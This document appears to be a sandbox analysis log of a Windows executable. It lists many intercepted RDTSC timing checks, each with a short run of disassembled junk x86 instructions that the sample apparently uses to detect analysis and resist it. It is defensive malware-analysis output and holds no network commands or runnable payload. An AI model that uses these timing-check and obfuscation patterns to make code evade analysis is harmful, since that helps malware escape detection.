    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761763 second address: 761769 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761769 second address: 76176D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 761885 second address: 76188B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 766755 second address: 76676A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C1h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76676A second address: 766770 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FBD13 second address: 6FBD1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007EFF192480B6h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765435 second address: 76543B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76543B second address: 765441 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765441 second address: 765447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765447 second address: 765478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 pop esi 0x00000009 pushad 0x0000000a jmp 00007EFF192480BFh 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007EFF192480BEh 0x00000016 popad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c push edi 0x0000001d pop edi 0x0000001e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765478 second address: 765494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60ECh 0x00000007 jl 00007EFF192B60E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765494 second address: 76549E instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFF192480B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76549E second address: 7654B3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F0h 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765C19 second address: 765C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765C1F second address: 765C23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765C23 second address: 765C44 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 765EB7 second address: 765EC7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ecx 0x0000000a pushad 0x0000000b popad 0x0000000c pop ecx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7662E1 second address: 766302 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 jmp 00007EFF192480C5h 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D882 second address: 76D88E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFF192B60E6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76D88E second address: 76D893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773345 second address: 773349 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773349 second address: 77334D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77334D second address: 773353 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773353 second address: 773394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 pushad 0x00000008 jbe 00007EFF192480B8h 0x0000000e pushad 0x0000000f popad 0x00000010 pushad 0x00000011 jmp 00007EFF192480BFh 0x00000016 jl 00007EFF192480B6h 0x0000001c jmp 00007EFF192480C9h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772039 second address: 77203F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77203F second address: 772044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772044 second address: 772049 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772194 second address: 772198 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772B4F second address: 772B57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772CB5 second address: 772CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772FD8 second address: 772FF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFF192B60F7h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 772FF8 second address: 773014 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007EFF192480C0h 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 773014 second address: 77303C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jbe 00007EFF192B60ECh 0x0000000f push eax 0x00000010 push edx 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77303C second address: 773040 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777CEF second address: 777D0B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007EFF192B60EAh 0x0000000e jl 00007EFF192B60E6h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777D0B second address: 777D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480C6h 0x00000009 jne 00007EFF192480B6h 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776A41 second address: 776A5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60F8h 0x00000009 pop eax 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776A5E second address: 776A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C5h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738AAC second address: 59402A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 nop 0x00000009 mov cx, A3E6h 0x0000000d push dword ptr [ebp+122D1089h] 0x00000013 xor dword ptr [ebp+122D28F6h], edx 0x00000019 call dword ptr [ebp+122D1D19h] 0x0000001f pushad 0x00000020 jmp 00007EFF192B60F2h 0x00000025 or dword ptr [ebp+122D250Bh], ecx 0x0000002b xor eax, eax 0x0000002d mov dword ptr [ebp+122D250Bh], ebx 0x00000033 jmp 00007EFF192B60F0h 0x00000038 mov edx, dword ptr [esp+28h] 0x0000003c pushad 0x0000003d mov di, ax 0x00000040 xor dword ptr [ebp+122D250Bh], edi 0x00000046 popad 0x00000047 mov dword ptr [ebp+122D2CC5h], eax 0x0000004d jmp 00007EFF192B60EAh 0x00000052 or dword ptr [ebp+122D296Dh], ebx 0x00000058 mov esi, 0000003Ch 0x0000005d mov dword ptr [ebp+122D1D6Bh], edi 0x00000063 add esi, dword ptr [esp+24h] 0x00000067 jno 00007EFF192B60F4h 0x0000006d lodsw 0x0000006f pushad 0x00000070 mov bl, ch 0x00000072 jmp 00007EFF192B60EDh 0x00000077 popad 0x00000078 add eax, dword ptr [esp+24h] 0x0000007c cld 0x0000007d mov ebx, dword ptr [esp+24h] 0x00000081 or dword ptr [ebp+122D250Bh], ecx 0x00000087 pushad 0x00000088 mov ebx, dword ptr [ebp+122D2F01h] 0x0000008e mov ecx, eax 0x00000090 popad 0x00000091 nop 0x00000092 jmp 00007EFF192B60F6h 0x00000097 push eax 0x00000098 push eax 0x00000099 push edx 0x0000009a jmp 00007EFF192B60EFh 0x0000009f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738BBF second address: 738BC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738C6C second address: 738CC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007EFF192B60E6h 0x00000009 jl 00007EFF192B60E6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 756102ADh 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007EFF192B60E8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000018h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push 5833BB48h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007EFF192B60F9h 0x0000003f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 738FC8 second address: 738FD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7390E9 second address: 73912F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d pop eax 0x0000000e popad 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov edx, edi 0x00000015 push 00000004h 0x00000017 push 00000000h 0x00000019 push ecx 0x0000001a call 00007EFF192B60E8h 0x0000001f pop ecx 0x00000020 mov dword ptr [esp+04h], ecx 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc ecx 0x0000002d push ecx 0x0000002e ret 0x0000002f pop ecx 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D1D54h], edi 0x00000037 push eax 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 739485 second address: 7394AE instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFF192480B8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007EFF192480C8h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7394AE second address: 7394B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA267 second address: 6FA26D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA26D second address: 6FA271 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FA271 second address: 6FA29F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007EFF192480C1h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776D2E second address: 776D44 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007EFF192B60F1h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776D44 second address: 776D5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 jmp 00007EFF192480BDh 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776F0F second address: 776F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776F13 second address: 776F1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776F1B second address: 776F25 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007EFF192B60EEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 776F25 second address: 776F3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007EFF192480BAh 0x0000000c ja 00007EFF192480B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7770B1 second address: 7770C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60F4h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7770C9 second address: 7770CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777200 second address: 777208 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777208 second address: 77720E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77720E second address: 777217 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7773AD second address: 7773B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7773B1 second address: 7773B7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7773B7 second address: 7773C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7773C2 second address: 7773C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77768D second address: 7776A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480C3h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7776A4 second address: 7776D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007EFF192B60F3h 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFF192B60F7h 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777821 second address: 777825 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 777825 second address: 77783B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192B60F2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D58E second address: 77D5A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 push edi 0x0000000a jnp 00007EFF192480C2h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DE15 second address: 77DE1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DE1B second address: 77DE1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DE1F second address: 77DE23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7811D9 second address: 7811DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7811DD second address: 781206 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007EFF192B60ECh 0x00000010 jmp 00007EFF192B60F1h 0x00000015 popad 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7830DE second address: 7830E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785067 second address: 78506C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78506C second address: 785088 instructions: 0x00000000 rdtsc 0x00000002 jc 00007EFF192480CEh 0x00000008 jmp 00007EFF192480C2h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78521F second address: 785252 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push edi 0x00000006 jmp 00007EFF192B60ECh 0x0000000b pop edi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007EFF192B60E6h 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a jmp 00007EFF192B60F0h 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 785252 second address: 785263 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192480BCh 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788E86 second address: 788EA6 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007EFF192B60F7h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788EA6 second address: 788EAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788EAC second address: 788EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788EB1 second address: 788EB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788EB7 second address: 788ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFF192B60EFh 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 788ECA second address: 788EDC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007EFF192480D2h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78919A second address: 78919E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78919E second address: 7891D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007EFF192480C9h 0x0000000b jmp 00007EFF192480C0h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7891D3 second address: 7891E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007EFF192B60ECh 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7891E6 second address: 7891FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFF192480BFh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7891FB second address: 7891FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7891FF second address: 789203 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789203 second address: 789209 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AA95 second address: 78AAB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jmp 00007EFF192480C3h 0x0000000a push eax 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700ECD second address: 700EDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jno 00007EFF192B60E6h 0x0000000c popad 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700EDA second address: 700F05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFF192480C6h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007EFF192480BFh 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 700F05 second address: 700F09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78C043 second address: 78C047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
